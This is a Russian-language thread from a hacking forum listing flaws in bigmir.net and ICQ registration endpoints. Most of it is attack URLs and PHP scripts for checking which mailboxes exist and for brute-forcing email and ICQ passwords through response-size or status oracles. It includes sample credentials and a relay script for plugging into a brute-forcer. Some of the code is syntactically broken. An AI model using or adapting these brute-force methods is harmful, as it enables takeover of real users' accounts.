Форум АНТИЧАТ - Баги bigmir.net

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Баги bigmir.net (https://forum.antichat.xyz/showthread.php?t=70947)

Баги bigmir.net

#1
Bag name: regisration mail (no pic)
http://coregs.bigmir.net/?connectorId=_icqFlashConnector&eStage=1&uin=0&key =05CD194AA8D3C6158478A5C8E7BF1692C5386EE725079A146 70F16CC647A70B1F8A9C9FC715DF466D6DD3555E3ED483227C 27752F445C9C40BE6C013D88143934F6E87F782F3C5BF0DACC D365CD4FBB96B194553955EDED603ED920667DA0516&pass=5 21338&fname=&lname=&s=0&nick=&quest_str=%CD%EE%EC% E5%F0%20%EF%E0%F1%EF%EE%F0%F2%E0&answer=678345&day =0&month=0&year=0&country=380&city=10101&login=hgh jjhgfhhg

Login: hghjhg
Passwd: 521338

#2
Bag name: Check mail in valid (speed)

http://passport.bigmir.net/js/free.js?0::login=gdfgfdgdf

Login: gdfgfdgdf

если ответ true то значит мыло свободное

#3
Bag name: Brut mail ( speed and ecomon traffic)

http://www.icq.com/xtraz/products/coreg/Cactus/php/checkLspDetails.php?distid=10100&ver=2052&username =supdport@bigmir.net&password=521338

Mail: supdport@bigmir.net
Passwd: 521338

если ответ времери 1 то значит пароль верный, если 2 то пасс неверный

#4 Bag name: Brut mail 2 (high speed)
http://coreg.bigmir.net/?uin=0&r_type=2&email=rjzidomf@bigmir.net&pass=sta ssats&subm=1

Mail: rjzidomf@bigmir.net
Passwd: stassats

В ответе хедера Content-Length: можна написать скоросной брут мыл
если розмер больше 2000 то пароль правельный, соотвецтвенно если меньше то пароль неправльный

Found by WEB-DEFENCE.RU

Немного оптимизировал процесс.
для бага #2(
Bag name: Check mail in valid (speed))

PHP код:


		
			
<?  

 echo "<pre>\n";  

 @set_time_limit(0);  

 @ini_set("display_errors","0");  

 $hostname = gethostbyname('passport.bigmir.net');  

 function login($login)  

 {  

  global $hostname;  

  $responce = "";  

  $fsock    = fsockopen($hostname,80,$errnum,$errstr,2);  

  $headers  = "GET http://passport.bigmir.net/js/free.js?0::login=$login HTTP/1.1\n";  

  $headers .= "Host: passport.bigmir.net\n";  

  $headers .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\n";  

  $headers .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";  

  $headers .= "Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3\n";  

  $headers .= "Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7\n";  

  $headers .= "Keep-Alive: 500\n";  

  $headers .= "Connection: close\n";  

  $headers .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";  

  fwrite   ($fsock,$headers);  

  while    (!feof($fsock)) $responce .= fread($fsock,1024);   

  fclose   ($fsock);   

 if(preg_match($responce, $rez)) echo $rez[1]; else echo 'Something not right...';  

//echo $responce;  

}  

login("gdfgfdgdf");  

echo "</pre>";  

?>

Code by WEB-DEFENCE.RU

О нормально.
Магу-Волшебнику привет =)) бигмир нет и не будет :lol:

*Demo версия скрипта для перебора паролей через баг №3.
- Устанавливаем скрипт на север.
- берём любой брутфорсер травим на скрипт.

PHP код:


		
			
<?

//Web-DEFENCe.rU

$name=''; 

$pass=''; 

$_POST   = &$HTTP_POST_VARS;

$_GET    = &$HTTP_GET_VARS;

$_SERVER = &$HTTP_SERVER_VARS;

if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass)

   exit("<b>Access Denied</b>");

   }

}     

  global $hostname;   

  $responce = "";   

  $fsock    = fsockopen($hostname,80,$errnum,$errstr,2);   

  $headers  = "GET http://www.icq.com/xtraz/products/coreg/Cactus/php/checkLspDetails.php?distid=10100&ver=2052&username=$name@bigmir.net&password=$pass HTTP/1.1\n";   

  $headers .= "Host: passport.bigmir.net \n";   

  $headers .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\n";   

  $headers .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";   

  $headers .= "Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3\n";   

  $headers .= "Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7\n";   

  $headers .= "Keep-Alive: 500\n";   

  $headers .= "Connection: close\n";   

  fwrite   ($fsock,$headers);   

  while    (!feof($fsock)) $responce .= fread($fsock,1024);    

  fclose   ($fsock);    

 if(preg_match($responce, $rez)) echo $rez[1];

}

?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">

<title>Верный пасс.</title>

<style type="text/css">

<style type="text/css" media="all">

<?

echo ($name:$pass);

?>

Code by WEB-DEFENCE.RU

_https://coregs.bigmir.net/?utf8=yes&connectorId=_icqFlashConnector&connector Id=_icqFlashConnector&eStage=1&uin=475456491&key=8 AE2D84F5AC8C414B11A73672505266B9693A34372FE5C77068 5D1D4DF67726D72EB27E3D72999AF6629070B2CAB84FA806CF 20C7EB3420043509E1DC0DDA0603E0C806318D201598EE0F00 5506A5A7BD8EE4AF2AD0E5B25EC65EB7B4A3458ED&pass=521 339&fname=&lname=&s=0&nick=&quest_str=?%92?%B0N??% B5%20?%BBNZ?%B1???????%B5%20N%87??N??%BB???&quest_ str=?%92?%B0N??%B5%20?%BBNZ?%B1???????%B5%20N%87?? N??%BB???&answer=ffffgdf&day=0&month=0&year=0&coun try=380&city=10101&login=hjfjttffgghktf

если пароль подходит к асе то рега "ок" если нет то ошибка под номером 5.

Цитата:

Сообщение от КВР

Никакого заголовка не возвращяет эта ссылка :(
И пробелы убирал и т.д...
Просто пустая страница :(

А так по идее можно перебирать пароль к любой аське без прокси я так понимаю?

Nightmarе, разбери ссылку на логические куски.
Заполни свои логин пасс в нужных местах.
Если заполнено верно вернёт "ок".
Если не верно то пустую страницу.